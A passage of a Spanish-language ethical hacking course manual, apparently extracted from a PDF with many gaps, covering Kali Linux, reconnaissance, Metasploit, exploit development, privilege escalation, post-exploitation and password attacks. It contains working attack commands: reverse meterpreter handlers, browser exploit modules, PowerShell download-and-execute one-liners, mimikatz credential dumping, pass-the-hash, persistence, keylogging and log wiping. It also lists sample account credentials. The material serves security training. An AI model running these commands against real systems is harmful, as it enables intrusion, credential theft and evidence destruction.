Ethical Hacking
Ethical Hacking
Ethical Hacking
Security+, CEHv8
[email protected]
CopyLeft
Marzo - 2016
CONVENCIONES USADAS EN LA GUIA
Tips y consejos :
Tip 1
Notas importantes:
Nota 1
exploit1multi/handler
/root/shell
Archivo de configuracin:
default-lease-time 600;
max-lease-time 7200;
range 192.168.2.51 192.168.2.100;
}
Versin:
Windows XP Windows 7 Windows 8 Windows 8.1 Windows 10
Windows Windows 2008 Windows Windows
2003 2012 2012R2
Distribucin:
Basados en Basados en paquetes
paquetes DEB RPM
Privilegios
Tipo de
permiso:
Usuarios Permisos elevados
comunes (admin)
I. ENTORNO DE KALI LINUX.................................................................................... 2
1. Estructura de archivos:..................................................................................... 2
1.1. Comandos bsicos............................................................................................. 3
1.2. Actualizar el sistema....................................................................................... 3
1.3. Servicios bsicos.............................................................................................. 4
1.4. Usando tuberas en linux................................................................................ 6
1.5. Configurando la red......................................................................................... 7
1.6. Comandos tiles................................................................................................ 9
1.7. Buscando archivos.......................................................................................... 12
1.8. Permisos y propiedades................................................................................. 13
1.9. Gestin de procesos....................................................................................... 15
II. CONOCIMIENTOS BASICOS............................................................................. 17
2. Terminologa....................................................................................................... 17
2.1. Sistemas numricos....................................................................................... 19
2.2. Codificaciones................................................................................................ 20
2.3. Herramientas bsicas...................................................................................22
2.3.1. Netcat.......................................................................................................... 22
2.3.2. Wireshark.................................................................................................... 23
2.3.3. Netcat encriptado..................................................................................... 25
2.4. Tipos de shell................................................................................................. 26
2.4.1. SHELL DIRECTA (bind shell)..................................................................26
2.4.2. SHELL REVERSA (reverse shell)........................................................... 27
III. RECOLECCION DE INFORMACION................................................................. 30
3. Puertos relevantes........................................................................................... 30
3.1. Pasiva................................................................................................................ 30
3.2. Activa............................................................................................................... 35
3.2.1. DNS............................................................................................................... 35
3.2.2. SNMP............................................................................................................ 36
3.2.3. SMB............................................................................................................... 38
3.2.4. SSL/TL......................................................................................................... 40
3.2.5. SMTP............................................................................................................ 40
IV. ESCANEOS..............................................................................................................42
4. Escaneadores de redes................................................................................... 42
4.1. ARP................................................................................................................... 42
4.2. Traceroute...................................................................................................... 42
4.2.1. Nmap............................................................................................................. 43
4.2.2. Otras herramientas...................................................................................44
4.3. Escaneadores de vulnerabilidades.............................................................46
4.4. Escaneador de vulnerabilidades en aplicaciones web............................47
4.5. Escaneador de configuraciones errneas................................................ 49
V. ATAQUES EN REDES LAN.................................................................................... 51
5. Saltando VLANs................................................................................................ 51
5.1. Switch spoofing (Trunk 802.1Q)................................................................ 51
5.2. Sniffing pasivo................................................................................................51
5.3. Sniffing activo............................................................................................... 52
5.4. DHCP falso...................................................................................................... 54
5.5. Otros ataques LAN....................................................................................... 55
VI. METASPLOIT.......................................................................................................... 57
6. Tipos de mdulos.............................................................................................. 57
6.1. Comando bsicos de metasploit................................................................. 58
6.2. Uso bsico....................................................................................................... 59
6.3. Creando backdoors....................................................................................... 60
6.3.1. Windows....................................................................................................... 60
6.3.1.1. Recibir shell.............................................................................................. 61
6.3.2. Linux.............................................................................................................. 62
6.3.2.1. Recibir shell............................................................................................. 62
6.4. Exploits comunes........................................................................................... 62
6.5. Comandos bsicos de meterpreter (Meta-Interpreter)..................... 63
6.6. Otros payloads............................................................................................... 64
6.7. Atacando al cliente....................................................................................... 65
6.8. Elevar privilegios........................................................................................... 67
6.8.1. Windows....................................................................................................... 67
6.8.2. Linux.............................................................................................................. 68
6.9. Post explotacin............................................................................................ 69
6.9.1. Windows PowerShell................................................................................. 69
6.9.2. Keylogger y sniffer.................................................................................... 71
6.9.3. Recolectar credenciales almacenadas................................................... 72
6.9.4. Extraer password y hashes de memoria...............................................74
6.9.5. Pass the hash.............................................................................................. 76
6.10. Acceder a redes internas:........................................................................ 76
6.10.1. Port forwarding........................................................................................ 77
6.10.2. Pivotear...................................................................................................... 78
6.11. Persistencia.................................................................................................. 80
6.12. Borrar huellas............................................................................................... 81
6.12.1. Manipulacin de fecha de creacin/acceso....................................... 82
VII. DESARROLLO DE EXPLOITS.............................................................................84
7. Conceptos bsicos............................................................................................ 84
7.1.1. Los registros del CPU............................................................................... 84
7.1.2. Mapa de memoria....................................................................................... 85
7.1.3. Memoria del proceso................................................................................. 86
7.1.4. Stack y Heap............................................................................................... 86
7.2. Tipos de exploit............................................................................................. 89
7.3. Debuggers........................................................................................................ 91
7.3.1. IDA................................................................................................................ 91
7.3.2. Immunity Debugger................................................................................... 93
7.4. Protecciones contra exploits...................................................................... 96
7.5. Desarrollando exploits:................................................................................ 96
7.5.1. Bufferoverflow...........................................................................................96
7.5.2. Structured Exception Handler (SEH )............................................... 105
VIII. ESCALAMIENTO DE PRIVILEGIOS..............................................................112
8. Anillos de proteccin de los sistemas operativos.................................... 112
8.1. Escalamiento en Windows.......................................................................... 113
8.1.1. Enumeracin............................................................................................... 113
8.1.2. Buscar passwords..................................................................................... 114
8.1.3. Buscar autoruns perdidos....................................................................... 115
8.1.4. DLL hijacking Windows (WinXP,Win2003,Win7).............................. 116
8.2. Linux................................................................................................................ 119
8.2.1. Enumeracin............................................................................................... 119
IX. POST EXPLOTACION......................................................................................... 121
9. Comandos windows...........................................................................................121
9.1. Transferencia de archivos......................................................................... 121
9.2. Extraer hashes de Security Account Manager (SAM)...................... 124
9.3. Extraer hashes y password de memoria (LSASS)...............................124
9.4. Escaneo desde la maquina comprometida.............................................. 126
9.5. Borrando huellas.......................................................................................... 127
X. PASSWORD ATTACKS.........................................................................................130
10. Online............................................................................................................... 130
10.1. Ataque de diccionario................................................................................ 131
10.1.1. Password profiling................................................................................... 131
10.2. Crakeando passwords usando GPU......................................................... 134
10.3. Pass the hash.............................................................................................. 137
10.4. Ataques online............................................................................................ 138
XI. HACKING WEB APPLICATIONS...................................................................... 141
11. Identificar puntos de entrada....................................................................141
11.1. XSS (Cross-site scripting)...................................................................... 142
11.1.1. Frameworks de explotacin................................................................. 145
11.2. INYECCION SQL...................................................................................... 147
11.2.1. Tipos de SQLi..........................................................................................150
11.2.2. ERROR BASED........................................................................................ 150
11.2.3. UNION BASED....................................................................................... 152
11.3. Control de acceso.......................................................................................157
11.4. Usar componentes vulnerables............................................................... 157
11.5. Web backdoors.......................................................................................... 159
XII. PORT REDIRECTION & TUNNELING............................................................ 161
12. Port Fordwarding........................................................................................... 161
12.1. Tneles SSH............................................................................................... 164
12.1.1. SSH Tunneling - Local........................................................................... 164
12.1.2. SSH Tunneling Remoto..........................................................................165
12.1.3. Dynamic Port Forwarding......................................................................168
12.2. Tnel HTTP................................................................................................. 172
XIII. DENEGACION DE SERVICIO (DoS)............................................................. 176
13. Ataques basados en volumen...................................................................... 176
13.1. Ataques a protocolo.................................................................................. 178
13.2. Ataques a nivel de aplicacin...................................................................179
XIV. EVADIENDO IDS/IPS,FIREWALL Y ANTIVIRUS.................................. 182
14. Antivirus.......................................................................................................... 182
14.1.1. Encriptadores/Ofuscadores................................................................ 182
14.1.2. Frameworks..............................................................................................183
XV. ATTACKING WIRELESS.................................................................................. 188
15. Monitoriar redes........................................................................................... 188
15.1. Atacando WPS (WiFi Protected Setup)............................................... 189
15.1.1. WPS Pixie dust attack.......................................................................... 189
15.1.2. Fuerza bruta............................................................................................ 190
15.2. Atacando WPA............................................................................................ 191
15.2.1. Cambiar de direccin MAC................................................................... 192
15.3. Atacando WEP............................................................................................ 192
XVI. CIBER-SEGURIDAD.......................................................................................... 195
16. Historia............................................................................................................195
16.1. Advanced Persistent Threat (APT)....................................................... 196
16.2. Uso de armas 0-day................................................................................... 198
16.3. Espionaje de otros pases........................................................................ 198
XVII. Anexos................................................................................................................. 201
17. Compilando programas (C++)....................................................................... 201
17.1. Usando Visual Studio................................................................................ 204
17.2. Usando !mona.............................................................................................. 207
17.3. Diferencias entre bases de datos......................................................... 207
17.4. Variables internas de bases de datos.................................................. 208
17.5. Explotacin automtica (sqlmap)........................................................... 208
17.6. Probar tipos de datos para la inyeccin............................................... 209
17.7. Archivos comprimidos............................................................................... 210
17.7.1. Desempacar zip en maquina remota................................................... 212
17.8. Enviando una Reverse shell (linux)......................................................... 212
XVIII. GLOSARIO........................................................................................................ 215
ETHICAL HACKING
1
ENTORNO DE KALI
LINUX
1
ETHICAL HACKING
Username: root
Password: toor
1. Estructura de archivos:
Directorio Descripcin
/usr/bin Este es el directorio principal de los programas ejecutables
de linux.
configurar aqu
Exploits compilados
/usr/share/exploits/
2
ETHICAL HACKING
Directorio de webshells
/opt/web/webshells/
Directorio de passwords
/usr/share/wordlist
apt-get update
3
ETHICAL HACKING
Actualizar el sistema
apt-get upgrade
SSH
service ssh start
service ssh stop
WEB (/var/www)
service apache2 start
service apache2 stop
FTP (/ftphome)
service pure-ftpd start
service pure-ftpd stop
DHCP
default-lease-time 600;
max-lease-time 7200;
4
ETHICAL HACKING
Iniciar el servicio:
Listar servicios:
chkconfig --list
5
ETHICAL HACKING
Operador Funcin
< Redirigir la entrada estndar
> Redireccionar la salida estndar
>> Redireccionar la salida estndar (no destructivo)
2> Redirigir la salida de error estndar
6
ETHICAL HACKING
Ejemplos:
tuberas:
Con tuberas que podemos utilizar la salida de un proceso como la entrada de
otro proceso.
Ejemplo 1:
ls | wc -l > lista.txt
Paso a paso
ls : listar el directorio
wc -l : contar las lneas de la lista
> lista.txt : escribir el resultado en un archivo
Cada vez que se ejecuta este comando el contenido del archivo se sobrescribe.
Si desea guardar el uso resultado anterior:
ls | wc -l >> lista.txt
Paralela:
Secuencial:
Habilitar interface
ifconfig eth0 up
7
ETHICAL HACKING
Deshabilitar interface
Configurar IP Temporal
Configurar IP esttico
auto eth0
iface eth0 inet static
address 192.168.11.10
netmask 255.255.255.0
Actualizar IP
/etc/init.d/networking restart
dhclient eth0
Adicionar gateway
8
ETHICAL HACKING
nameserver 8.8.8.8
Grep
-v : Seleccin inversa
grep -r apache *
-r buscar recursivamente
Tr
9
ETHICAL HACKING
Sed
Sustitucin de texto
Uniq:
Cut
-d definir delimitador
-f Definir campo a mostrar
cut -d ; -f 1
10
ETHICAL HACKING
cut -d -f 1-3
Ejemplo:
Awk
Watch
watch -n 10 date
Diff
SCP
11
ETHICAL HACKING
locate:
El comando locate lee una o mas bases de datos preparadas por el comando
updatedb
updatedb
locate nc.exe
which:
which sbd
which nc
Find:
Buscar archivos
12
ETHICAL HACKING
a) Propiedad en linux
Cada archivo y carpeta pertenece a un usuario y un grupo
ls -l archivo.txt
Donde:
-rw-r-xrwx usuario grupo 4096 2009-04-02 11:21 archivo.txt
b) Permisos Linux
Linux tiene tres tipos de permiso de lectura (R), escritura (W) y ejecucin
(X). Los permisos se muestran en el siguiente orden: Propietario, Grupo y
Otros
Persisos de:
Propietario
Grupo
Otros
13
ETHICAL HACKING
donde:
r=4
w=2
x=1
chmod +r archivo.txt
chmod +w archivo.txt
chmod +x archivo.txt
14
ETHICAL HACKING
ps aux
pstree
top
htop
Kill -9 3834
3834 = [PID]
15
ETHICAL HACKING
2
CONOCIMIENTOS
BSICOS
16
ETHICAL HACKING
Vulnerabilidad
sistema
Corruption
Cdigo MS08-067
Microsoft
Exploit
17
ETHICAL HACKING
Payload
Ataque Zero-day
18
ETHICAL HACKING
Falso positivo
Es cuando creemos que es una vulnerabilidad pero realmente NO lo es
Falso negativo
Es cuando NO identificamos una vulnerabilidad y pasa desapercibido.
Binario
Hexadecimal
Ejemplos:
19
ETHICAL HACKING
2.2. Codificaciones
ASCII
20
ETHICAL HACKING
Codificacin URL
Ejemplo:
cve.mitre.org/cgi-bin/cvekey.cgi?keyword=linux
Codificando:
http://cve.mitre.org/cgi-bin/cvekey.cgi?%6b%65%79%77%6f%72%64=
%6c%69%6e%75%78
21
ETHICAL HACKING
UNICODE
Carcter Unicode
A 0041
& 0026
b 0062
4e2d
Usar https://www.branah.com/unicode-converter
nc -nv 66.172.10.69 80
22
ETHICAL HACKING
HEAD HTTP/1.1
-vv: Verbose
-z: Modo escaneo
-w: Tiempo mximo de espera (segundos)
nc -nlvp [puerto]
2.3.2. Wireshark
23
ETHICAL HACKING
Filtro de protocolos
Arp
http
Dns
DHCP --> bootp.option.type == 53
Por flags
tcp.flogs.syn
24
ETHICAL HACKING
2.3.3.Netcat encriptado
Bind Shell
Reverse shell
25
ETHICAL HACKING
nc nv [IP] [puerto]
26
ETHICAL HACKING
nc nv [IP] [puerto]
27
ETHICAL HACKING
nc -nlvp [puerto]
nc -nlvp [puerto]
28
ETHICAL HACKING
3
RECOLECCION DE
INFORMACION
29
ETHICAL HACKING
3.1. Pasiva
30
ETHICAL HACKING
Network Miner
/opt/NetworkMiner
mono NetworkMiner.exe
31
ETHICAL HACKING
Maltego
Credenciales:
Usuarios: [email protected]
Password: cognos2015
Archive.org
theharvester
-d: dominio
-b: buscador
32
ETHICAL HACKING
dmitry
-w: whois
-n: netcraft.com (OS, informacin del servidor web)
-e: Buscar emails
-s: Buscar subdominios
Foca (Windows 7)
C:\Users\myuser\Desktop\FocaPro\bin
33
ETHICAL HACKING
Recon-ng
Servicio
http://ipinfodb.com/account.php API Key
http://www.shodanhq.com/home API Key
Iniciar el framework
recon-ng
Subdominios adicionales
use recon/domains-hosts/netcraft
set SOURCE cisco.com
run
use recon/hosts-hosts/ip_neighbor
set SOURCE cisco.com
run
use recon/hosts-hosts/resolve
run
Informacin de IPs
use recon/hosts-hosts/ipinfodb
run
34
ETHICAL HACKING
SHODAN
https://www.shodan.io
country:"BO"
hostname:.gob.bo
net:"190.129.95.0/24"
3.2. Activa
3.2.1. DNS
[dominio] = megacorpone.com
dnsrecon -d [dominio]
dnsenum
dnsenum [dominio]
Obtiene:
servidores de nombres
Servidores de correo
Intentar transferencia de zona
Fierce
35
ETHICAL HACKING
dnsrecon -r 190.129.72.1/24
http://reverseip.domaintools.com/search/?q=190.129.72.%
Enumeracin IPv6
dnsdict6 -d google.com
3.2.2. SNMP
Trminos:
36
ETHICAL HACKING
onesixtyone
Una vez que sepamos que community string podemos usar, empleamos otros
scripts para obtener mas informacin
Snmpwalk
/usr/share/snmpenum/
Plataformas:
Windows.txt
Cisco.txt
linux.txt
37
ETHICAL HACKING
mibbrowser
/opt/enumeration/snmp/mibbrowser
bash browser.sh
Usar RCF1213.mib
3.2.3.SMB
S-1-5-21-4064627337-2434140041-2375368561-1036.
38
ETHICAL HACKING
dominio
1036: Relative ID (RID) Identifica a un grupo o usuario
Microsoft SIDs
500 Built-in Local administrator
501 Built-in Local guest
512 Built-in Domain administrator
Los nmeros mayores a 1000 se reservan para las cuentas de usuario.
Linux SIDs
Root UID, GID 0
0-999 cuentas propias de la mquina.
Los nmeros mayores a 500 se reservan para las cuentas de usuario.
Los nmeros mayores a 1000 se reservan para las cuentas de usuario
-U get userlist
-G get group and member list
-o Get OS information
-r enumerate users via RID cycling
-n Do an nmblookup (similar to nbtstat)
39
ETHICAL HACKING
3.2.4.SSL/TL
sslscan www.ekoparty.org:443
3.2.5. SMTP
Mediante el uso del comando VRFY podemos usar una lista de posibles usuarios
para comprobar cuales existen en el servidor.
Listado de usuarios:
/usr/share/wordlists/usuarios.txt (espaol)
/usr/share/wordlists/metasploit/unix_users.txt
40
ETHICAL HACKING
4
ESCANEOS
41
ETHICAL HACKING
IV.ESCANEOS
4. Escaneadores de redes
4.1. ARP
netdiscover -p -r 192.168.2.0/24
Escaneo ARP
arping 192.168.56.102
4.2. Traceroute
ICMP
traceroute scanme.nmap.org
42
ETHICAL HACKING
4.2.1.Nmap
Escaneos TCP
Escaneo activo
nmap -A 192.168.1.12
OS detection
version detection
script scanning
traceroute (UDP)
43
ETHICAL HACKING
Escaneo UDP
Opciones importantes
-n NO realizar resolucin DNS
-T [0-5] (0:lento, 5:Rpido)
-Pn NO realizar ping
4.2.2.Otras herramientas
Zmap
Masscan
Amap
xprobe2
Identificar S.O.
44
ETHICAL HACKING
xprobe2 192.168.0.102
Zenmap
zenmap
45
ETHICAL HACKING
Nessus
Actualizar
Iniciar el servicio
Username: kali
Password: Kali2015!
Si nos sale el error: nessus feed error corregirlo con los comandos:
/opt/nessus/sbin/nessuscli fetch --register KEY
/opt/nessus/sbin/nessusd -R
/opt/nessus/sbin/nessus-service -D
init 6
46
ETHICAL HACKING
OpenVAS
openvas-setup
openvas-start
Nexpose
Iniciar el servicio
./nscsvc.sh start
/opt/rapid7/nexpose/nsc
https://localhost:3780/login.htm
VEGA
Iniciar Vega:
Vega
47
ETHICAL HACKING
Iniciar w3af:
/opt/web/w3af/
./w3af_gui
48
ETHICAL HACKING
Wapiti
SPARTA
sparta
49
ETHICAL HACKING
5
ATAQUES EN REDES
LAN
50
ETHICAL HACKING
5. Saltando VLANs
voiphopper
voiphopper -i eth0 -c 2
Yersinia
Modo promiscuo
51
ETHICAL HACKING
etterlog nombre-log.eci -p
Envenamiento ARP
52
ETHICAL HACKING
53
ETHICAL HACKING
Archivo de configuracin:
/etc/mitmf/mitmf.cfg
54
ETHICAL HACKING
pig.py -v 2 -c [interface]
-v 2 Nivel de mensajes
-c Habilitar colores
55
ETHICAL HACKING
6
METASPLOIT
56
ETHICAL HACKING
VI. METASPLOIT
6. Tipos de mdulos
Arquitectura:
57
ETHICAL HACKING
Tipos de payload:
Iniciando metasploit
msfconsole
58
ETHICAL HACKING
Windows
search ms08-067
Otros
59
ETHICAL HACKING
6.3.1. Windows
-p = tipo de payload
LHOST = IP de Kali
LPORT = Puerto disponible en Kali
60
ETHICAL HACKING
-k Mantener funcionalidad
Windows (DLL)
Tambien podemos generar el backdoor como una libreria dll que luego se
inyecte en memoria.
En metasploit:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.105
set LPORT 443
exploit
61
ETHICAL HACKING
6.3.2. Linux
Generar troyano:
En metasploit:
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.0.105
set LPORT 443
Exploit
S.O. Modulo
Windows XP exploit/windows/smb/ms08_067_netapi
Win2003*
Win2003 exploit/windows/dcerpc/ms03_026_dcom
Windows exploit/windows/smb/ms09_050_smb2_negotiate_func_index
2008 x86
Window Vista
62
ETHICAL HACKING
Una vez explotado una vulnerabilidad podemos obtener una shell remota, o
mejor aun una sesin de meterpreter.
Genricos
Comandos de red
63
ETHICAL HACKING
Otros
Estos payloads hacen que el trafico se parezca como un trafico HTTP comn y
corriente lo que no hara levantar sospecha en los content-inspection filters
64
ETHICAL HACKING
use exploit/multi/browser/adobe_flash_hacking_team_uaf
set URIPATH /
set SRVPORT 80
set SRVHOST [ip-kali]
Java deja firmar un applet con el nombre que decidamos (apple, google)
Probado en: Win7-IE 8 (Java 7)
use exploit/multi/browser/java_signed_applet
set LPORT 567
set uripath /
set SRVPORT 80
set SRVHOST [ip-kali]
exploit
use exploit/multi/browser/java_jre17_jmxbean
set uripath /
set SRVPORT 80
set SRVHOST [ip-kali]
exploit
65
ETHICAL HACKING
Firefox (Plugin)
use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set ADDONNAME Video player
set srvhost [attacker-IP]
set uripath /
set srvport 80
exploit
/root/Desktop/Laboratorio/ClientAttacks/java/
Compilar java
/opt/jdk1.7/bin/javac Java.java
66
ETHICAL HACKING
Empaquetar
nc -nlvp 443
6.8.1.Windows
run post/windows/gather/win_privs
67
ETHICAL HACKING
getsystem
use exploit/windows/local/bypassuac
set payload windows/meterpreter/reverse_tcp
set LHOST [ip-kali]
set LPORT 777
set SESSION 1
exploit
6.8.2.Linux
use exploit/linux/local/udev_netlink
set SESSION 1
exploit
68
ETHICAL HACKING
6.9.1.Windows PowerShell
PowerShell 1.0 Windows XP, Server 2003 (No instalado por defecto)
PowerShell 2.0 Windows 7 y Windows Server 2008
PowerShell 3.0 Windows 8 y Windows Server 2012
Obtener meterpreter
Abrir otro msfconsole y esperar shell
use exploit/multi/handler
set payload windows/powershell_reverse_tcp
set lhost 192.168.80.174
set lport 8888
exploit
Powershell bsico
Listar modulos
69
ETHICAL HACKING
Get-Module -ListAvailable
Establecir politica
Set-ExecutionPolicy RemoteSigned
Remover modulo
Remove-Module -Name PsGet
Posh-SecMod
Info:
Instalar posh-SecMod
iex (New-Object
Net.WebClient).DownloadString("https://gist.github.com/darkope
rator/6404266/raw/982cae410fc41f6c64e69d91fc3dda777554f241/gis
tfile1.ps1")
Importar modulo
import-module Posh-SecMod
Realizar escaneos
70
ETHICAL HACKING
Power Sploit
Info:
/opt/post-explotation/Windows/PowerSploit/
Portscan
Instalando
IEX (New-Object
Net.WebClient).DownloadString("http://[ip-kali]/PowerSploi
t/Recon/Invoke-Portscan.ps1")
Ejecutando
Invoke-Portscan -Hosts 192.168.80.128,192.168.80.1 -Ports
"23,22,21,445,139,3389"
6.9.2.Keylogger y sniffer
Sniffing
use sniffer
sniffer_interfaces
sniffer_start 3
sniffer_stats 3
sniffer_dump 3 /root/dump.cap
sniffer_stop 3
71
ETHICAL HACKING
3: Numero de interfaz
Keylogger
ps
migrate 1740
keyscan_start
keyscan_dump
keyscan_stop
/opt/post-explotation/Windows/stored-pass/
Navegadores:
Firefox
Internet Explorer
Google Chrome
Opera Browser
Flock Browser
72
ETHICAL HACKING
Clientes de correo:
Password de red
Password de WIFI
Info:
Mimikatz
74
ETHICAL HACKING
load mimikatz
msv
kerberos
75
ETHICAL HACKING
Info:
Server Server
2003 2008
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set LHOST [kali-ip]
set LPORT 443
set SMBUser [user]
set SMBPass [hash]
run get_local_subnets
run arp_scanner -r 10.0.0.0/24
76
ETHICAL HACKING
En meterpreter
Para borrar:
77
ETHICAL HACKING
6.10.2. Pivotear
Crear ruta:
background
route add 10.0.0.0 255.0.0.0 1
route print
10.0.0.0 = [red]
255.0.0.0 = [mascara]
1 = Numero de sesin de meterpreter
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.0.0.10
set PORTS 21,22,23,25,80,135,445
set THREADS 10
run
78
ETHICAL HACKING
Si deseamos ejecutar cualquier otra herramienta (Ej nmap, etc ) tenemos que
usar un socks proxy para enrutar el trafico.
use auxiliary/server/socks4a
set SRVHOST 127.0.0.1
Run
Usando Proxychains
Adicionar en /etc/proxychains.conf
Ejecutar nmap
79
ETHICAL HACKING
6.11. Persistencia
migrate 3742
run persistence -U -A -i 60 -p 5678 -r 192.168.0.107
Registros usados:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Instalar servicio
run metsvc
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337
set RHOST [ip victima]
exploit
80
ETHICAL HACKING
Windows
Logs
clearev
Linux
Log Descripcion
messages Mensajes de log generales
auth.log, faillog, lastlog Logs de autenticacion
boot.log Logs del boot
syslog Logs del sistema
81
ETHICAL HACKING
timestomp -v documento.xls
timestomp documento.xls -b
82
ETHICAL HACKING
6
DESARROLLO DE
EXPLOITS
83
ETHICAL HACKING
7. Conceptos bsicos
84
ETHICAL HACKING
7.1.2.Mapa de memoria
Abrimos: C:\LAB\lab5-Exploits\msg.exe
85
ETHICAL HACKING
PEB contiene :
TEB contiene :
7.1.4.Stack y Heap
stack
Operaciones
Pop: Recoger un tem (registro) de la cima de la pila (Stack)
Push: Colocar un tem (registro) en la cima de la pila (Stack)
86
ETHICAL HACKING
87
ETHICAL HACKING
Absoluta: 0034FA73
Relativa a ESP ESP + 4
Relativa a EBP EBP -72
En immunity debugger:
88
ETHICAL HACKING
heap
/root/Desktop/Laboratorio/Lab5-exploits/basico/
89
ETHICAL HACKING
Stack overflow
Compilar
./stack 12345678901234567890123456
Heap overflow
Compilar
./heap 123456789012345678901234567890123456
Format string
Ocurre cuando los datos de entrada se evala como una orden por la
aplicacin. De esta manera, el atacante podra ejecutar cdigo, leer la pila
(stack), o causar un fallo de segmentacin en la aplicacin en ejecucin, .
90
ETHICAL HACKING
Compilar
Provocar error
7.3. Debuggers
7.3.1.IDA
IDA nos permite visualizar el flujo del programa de una mejor manera y
ademas podemos encontrar las funciones propias y su codigo ensamblador con
mayor facilidad.
En windows XP:
C:\SOFTWARE\ida66
91
ETHICAL HACKING
Interfaz de IDA
92
ETHICAL HACKING
7.3.2.Immunity Debugger
Instalado en WIndows XP
a) GPU Instructions
Direccin de memoria
cdigo de operacin (vista Hexadecimal) situado en esa direccin.
Cdigo en ensamblador (lenguaje maquina)
Comentarios (Adicionados automticamente por Immunity debugger)
b) Registers
93
ETHICAL HACKING
EAX
ECX
EDX
EBX
c) Memory Dump
d) Stack
Direccin de memoria
Datos almacenados en esa direccin (valor, otra direccin de memoria)
Comentarios
Vistas:
Executable Modules (e) : Listas todos los dll y otros ejecutables que estn
siendo utilizados por el programa.
94
ETHICAL HACKING
95
ETHICAL HACKING
Ejemplo SLMail:
96
ETHICAL HACKING
Viendo el contenido del exploit 638.py notamos que el exploit es para SLMAIL
5.5 pero para windows server 2000. Lo cual nos obliga a adecuarlo a nuestro
entorno (Windows XP)
97
ETHICAL HACKING
/root/Desktop/Laboratorio/Lab5-exploits/win/stack/SLMail
a) Fuzzing (2_fuzz.py)
Determinar el numero de bytes que generan error
b) Fuzzing (3_fuzz.py):
Descubrir el offset
pattern_create.rb 2700
Immnunity debugger
pattern_offset.rb 39694438
98
ETHICAL HACKING
pveWritebin.py chars.bin
99
ETHICAL HACKING
El registro ESP tiene una direccin de memoria diferente cada vez que
se ejecuta el programa por eso debemos buscar una direccin de
memoria que no sea aleatoria y apunte al registro ESP.
100
ETHICAL HACKING
C:\tools\pefinder
101
ETHICAL HACKING
En este caso no hay DLL del programa en la lista de DLL sin ASRL asi que
tenemos que buscar en una DLL del sistema
Ya que no hay ninguna DLL del programa utizable buscaremos en las DLL
del sistema operativo que usa el programa.
En Inmunity debugger:
!mona nosafesehaslr
102
ETHICAL HACKING
0X5f4a358f = "\x8F\x35\x4A\x5F"
C:\tools
e) Generando shellcode
f) Obtener shell
103
ETHICAL HACKING
nc -nvlp 4444
104
ETHICAL HACKING
105
ETHICAL HACKING
Cadena SEH:
106
ETHICAL HACKING
107
ETHICAL HACKING
Flujo de la explotacin:
1
http://www.free-test-online.com/binary/signed_converter.html
108
ETHICAL HACKING
/root/Desktop/Laboratorio/Lab5-exploits/win/SEH/easychat
109
ETHICAL HACKING
!mona nosafesehaslr
110
ETHICAL HACKING
8
ESCALAMIENTO DE
PRIVILEGIOS
111
ETHICAL HACKING
Windows usa:
ring 0 ( kernel mode )
ring 3 ( user mode.)
Linux usa:
ring 0 for kernel y controladores
ring 2 for cdigo privilegiado
ring 3 for cdigo NO-privilegiado
112
ETHICAL HACKING
Fuente: thehackernews.com2
8.1.1.Enumeracin
Info:
/opt/post-explotation/Windows
2
http://thehackernews.com/2016/02/windows-10-upgrade.html
113
ETHICAL HACKING
wmic_enumeration.bat
genera out.html
enumerate.bat
genera report.txt
Info:
Ir a la unidad C primero
Passwords en el registro
114
ETHICAL HACKING
cd C:\Windows\Panther
dir /s unattend.xml == autounattend.xml == sysprep.xml == syspref.inf
cd C:\Windows\System32
dir /s unattend.xml == autounattend.xml == sysprep.xml == syspref.inf
post/windows/gather/enum_unattend
* Solo busca el archivo unateend.xml
/usr/share/windows-binaries/
115
ETHICAL HACKING
Esta tcnica consiste en buscar servicios que intentan cargar DLL que no
existen, Podemos reemplazar con nuestra propia DLL.
Windows 7 (32/64)
116
ETHICAL HACKING
Windows XP
1opt/powershell/pathperm.ps1
117
ETHICAL HACKING
icacls c:\Perl\bin
118
ETHICAL HACKING
8.2. Linux
8.2.1.Enumeracin
Info:
/opt/post-explotation/Linux
119
ETHICAL HACKING
9
POST
EXPLOTACION
120
ETHICAL HACKING
IX.POST EXPLOTACION
9. Comandos windows
FTP
Info:
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome
/etc/init.d/pure-ftpd restart
121
ETHICAL HACKING
VBScript
Info:
122
ETHICAL HACKING
Ejecutar script
Powershell
Info:
Ejecutar script
123
ETHICAL HACKING
Info:
/usr/share/windows-binaries/
fgdump.exe
Con esta tcnica tambin se puede extraer los hashes de usuarios de otros
equipos que se logearon en ese equipo (RDP, terminal service, etc).
WCE
Info:
/usr/share/windows-binaries/
wce.exe -w
124
ETHICAL HACKING
Mimikats
Info:
module ~ sekurlsa: Este modulo extrae password, keys, pin codes, tickets
privilege::debug
125
ETHICAL HACKING
sekurlsa::logonpasswords
sekurlsa::kerberos
usr/share/windows-binaries/
Nbtscan
Info:
nbtscan.exe 192.168.0.0/24
Nmap
Info:
SP2+
vcredist_x86.exe /q
Ejecutar normalmente:
126
ETHICAL HACKING
Corromper logs
Info:
Download security.evtx
bless security.evtx
Adicionar caracteres 0D
127
ETHICAL HACKING
upload security.evtx
128
ETHICAL HACKING
10
PASSWORD
ATTACKS
129
ETHICAL HACKING
X. PASSWORD ATTACKS
a) SQL Inyeccion
b) Backups
c) Equipos comprometidos
10. Online
MD4
MD5
SHA1
SHA256
SHA512
LM
NTLM
MYSQL
CISCO7
JUNIPER
130
ETHICAL HACKING
https://hashkiller.co.uk/default.aspx
MD5
SHA1
NTLM
Diccionario base
Ampliando el diccionario:
131
ETHICAL HACKING
Fuente: wikipedia3
3
http://en.wikipedia.org/wiki/2012_LinkedIn_hack
132
ETHICAL HACKING
El script password-pattern.sh hace uso de John the ripper para aplicar las
reglas (/etc/john/john.conf)
mv password-personalizado.txt /usr/share/wordlist
133
ETHICAL HACKING
community-string.txt
Password-comunes.txt
real.txt (password reales)
Apellidos.txt
*digits.txt
Crackeando NTLM
0 = ataque directo
